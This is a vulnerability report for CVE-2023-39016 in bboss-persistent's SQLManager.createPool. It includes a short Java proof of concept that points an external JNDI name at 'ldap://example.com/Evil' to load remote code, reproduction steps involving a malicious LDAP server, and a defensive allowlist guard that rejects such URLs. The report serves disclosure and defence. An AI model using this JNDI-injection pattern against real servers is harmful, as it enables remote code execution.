CVE-2023-39016: There's a code injection vulnerability of `com.frameworkset.common.poolman.util.SQLManager.createPool` · Issue #I7MH08 · bboss/bboss - Gitee

bboss-persistent v6.0.9 and below was discovered to contain a code injection vulnerability in the component com.frameworkset.common.poolman.util.SQLManager.createPool. This vulnerability is exploited via passing an unchecked argument.


Affected Version
The latest version 6.0.9 and below.

Describe the vulnerability
The method com.frameworkset.common.poolman.util.SQLManager.createPool is designed to create a SQL connection pool. However, passing an unchecked argument to this API can lead to the execution of arbitrary commands. For instance, the following code lets an attacker execute arbitrary commands:

        JDBCPoolMetaData metaData = new JDBCPoolMetaData();
        // Unchecked external JNDI name: an LDAP URL on an attacker-controlled server
        metaData.setExternaljndiName("ldap://example.com/Evil");
        metaData.setExternal(true);
        SQLManager manager = SQLManager.getInstance();
        // createPool receives the metadata without validating the JNDI name
        manager.createPool(metaData);

To Reproduce
First, set up an LDAP server that serves malicious code. Then execute the code above to reproduce the issue.

Fix Suggestion
Filter LDAP, RMI and related protocols when using lookup.
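
One way to apply this suggestion, shown as an added example that is not bboss's own fix: validate the JNDI name against an allowlist before it reaches any lookup, rather than blocklisting individual schemes. The class `JndiNameGuard`, the method `requireLocal` and the policy of accepting only local `java:` names are assumptions made for illustration.

```java
import java.util.regex.Pattern;

/** Hypothetical guard (not part of bboss): checks a JNDI name before it is looked up. */
public final class JndiNameGuard {

    // Assumed policy: accept only names in the local java: namespace, such as
    // java:comp/env/jdbc/appDS. No second ':' is allowed after the prefix, so
    // ldap://, ldaps://, rmi://, dns://, iiop:// and any other URL scheme fail
    // to match, including upper-case or mixed-case spellings.
    private static final Pattern LOCAL_NAME =
            Pattern.compile("^java:[A-Za-z0-9_./-]+$");

    private JndiNameGuard() { }

    /** Returns the trimmed name if it is a local java: name, otherwise throws. */
    public static String requireLocal(String name) {
        if (name == null) {
            throw new IllegalArgumentException("JNDI name is null");
        }
        String trimmed = name.trim();
        if (!LOCAL_NAME.matcher(trimmed).matches()) {
            // Do not echo the rejected value into the message; log it separately if needed.
            throw new IllegalArgumentException("Rejected non-local JNDI name");
        }
        return trimmed;
    }

    public static void main(String[] args) {
        // Constructed sample inputs; the second one is the value from the report above.
        String[] samples = {
            "java:comp/env/jdbc/appDS",
            "ldap://example.com/Evil",
            "rmi://example.com/obj",
            "LDAP://example.com/Evil",
            "jdbc/appDS"
        };
        for (String s : samples) {
            try {
                requireLocal(s);
                System.out.println("accept  " + s);
            } catch (IllegalArgumentException e) {
                System.out.println("reject  " + s);
            }
        }
    }
}
```

A caller would pass the configured external JNDI name through `requireLocal` before handing the metadata to `createPool`, so a remote URL is refused before any lookup happens.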
